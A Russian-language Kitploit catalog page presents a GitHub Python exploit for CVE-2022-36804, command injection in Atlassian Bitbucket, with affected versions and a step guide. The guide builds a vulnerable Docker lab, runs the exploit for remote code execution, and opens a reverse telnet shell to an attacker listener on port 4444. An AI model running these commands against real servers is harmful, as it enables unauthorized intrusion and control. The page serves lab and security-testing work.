Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2022-36804 — Эксплойт на Python для CVE-2022-36804, инъекции команд в Atlassian Bitbucket Server и Data Center, позволяющей удаленное выполнение кода с правами на чтение. | Kitploit
Инструменты/GitHubGitHub/asepsaepdin/cve-2022-36804
Анализ уязвимостейЭксплуатацияЭксплуатация веб-приложенийТестирование на ПроникновениеКомандование и УправлениеОбучение и Образование
GitHubasepsaepdin/cve-2022-36804

CVE-2022-36804

Эксплойт на Python для CVE-2022-36804, инъекции команд в Atlassian Bitbucket Server и Data Center, позволяющей удаленное выполнение кода с правами на чтение.

Репозиторий
11 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2022-36804 - Уязвимость внедрения команд в Atlassian Bitbucket Server и Data Center

Python


⚠️ Только для образовательных и авторизованных целей исследования безопасности

Original Exploit Authors

Очень благодарны оригинальному автору PoC Walnut Security Services Pvt. Ltd

Description

Несколько конечных точек API в Atlassian Bitbucket Server и Data Center с версии 7.0.0 до 7.6.17, с 7.7.0 до 7.17.10, с 7.18.0 до 7.21.4, с 8.0.0 до 8.0.3, с 8.1.0 до 8.1.3, с 8.2.0 до 8.2.2, и с 8.3.0 до 8.3.1 позволяют удаленным злоумышленникам с правами чтения на публичный или частный репозиторий Bitbucket выполнять произвольный код путем отправки вредоносного HTTP-запроса. Эта уязвимость была сообщена через нашу программу вознаграждений за найденные ошибки пользователем TheGrandPew.


Step Guides

  1. Сначала клонируйте репозиторий

    root@kitploit:~
    git clone https://github.com/asepsaepdin/CVE-2022-36804.git
    
  2. Перейдите в каталог

    root@kitploit:~
    cd CVE-2022-36804
    
  3. Соберите уязвимый контейнер

    root@kitploit:~
    docker build -t CVE-2022-36804 .
    
  4. Запустите эфемерный контейнер

    root@kitploit:~
    docker run --rm -it --name CVE-2022-36804 CVE-2022-36804
    
  5. Проверьте IP-адрес контейнера

    root@kitploit:~
    docker inspect CVE-2022-36804 | grep "IPAddress"
    
  6. Настройте Atlassian Bitbucket и создайте новый публичный репозиторий, открыв URL: http://172.17.0.3:7990

  7. Проверьте удаленное выполнение кода (RCE)

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990
    
  8. Проверьте RCE с пользовательской командой (cmd)

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.2:7990 -c id
    
  9. С точки зрения атакующего, удаленное выполнение кода критически важно для получения доступа к интерактивной оболочке. Поэтому выполнение следующей команды инициирует обратный telnet-шелл через TCP на основе bash на систему атакующего на порту 4444/tcp:

    root@kitploit:~
    python3 cve-2022-36804.py -u http://172.17.0.3:7990 -c 'TF=$(mktemp -u);mkfifo $TF && telnet 172.17.0.1 4444 0<$TF | sh 1>$TF'
    
    root@kitploit:~
    nc -nlvp 4444
    

Благодарности

  • https://github.com/walnutsecurity/cve-2022-36804
  • https://nvd.nist.gov/vuln/detail/cve-2022-36804
Скачать инструмент